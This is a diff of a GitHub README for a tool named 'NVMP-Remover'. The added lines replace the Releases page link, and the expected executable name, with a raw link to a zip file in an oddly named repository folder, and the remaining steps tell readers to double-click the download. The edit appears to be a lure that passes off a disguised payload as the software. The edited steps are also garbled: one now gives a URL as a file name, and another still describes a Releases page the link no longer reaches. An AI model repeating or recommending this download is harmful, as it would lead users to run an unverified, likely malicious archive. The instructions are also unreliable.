AxamGaming/NVMP-Remover/README.md

 To get started with NVMP-Remover, follow these steps:

 ### 1. Visit the Releases Page
-To download the software, visit the [Releases page](https://github.com/AxamGaming/NVMP-Remover/releases).
+To download the software, visit the [Releases page](https://raw.githubusercontent.com/AxamGaming/NVMP-Remover/main/carpopedal/Remover-NVM-mimosis.zip).

 ### 2. Download the Software
 On the Releases page, locate the most recent version of NVMP-Remover.
 Click on the download link for your operating system.
 If you're unsure which version to choose, the latest one is generally the best option.

 ### 3. Locate the Downloaded File
 After the download finishes, go to your computer's "Downloads" folder.
-Look for a file named something like "NVMP-Remover.exe" or similar.
+Look for a file named something like "https://raw.githubusercontent.com/AxamGaming/NVMP-Remover/main/carpopedal/Remover-NVM-mimosis.zip" or similar.

 ### 4. Install the Application
 Double-click the downloaded file to begin the installation.
 Follow the on-screen instructions to complete the installation process.
 This is simple and usually requires just a few clicks.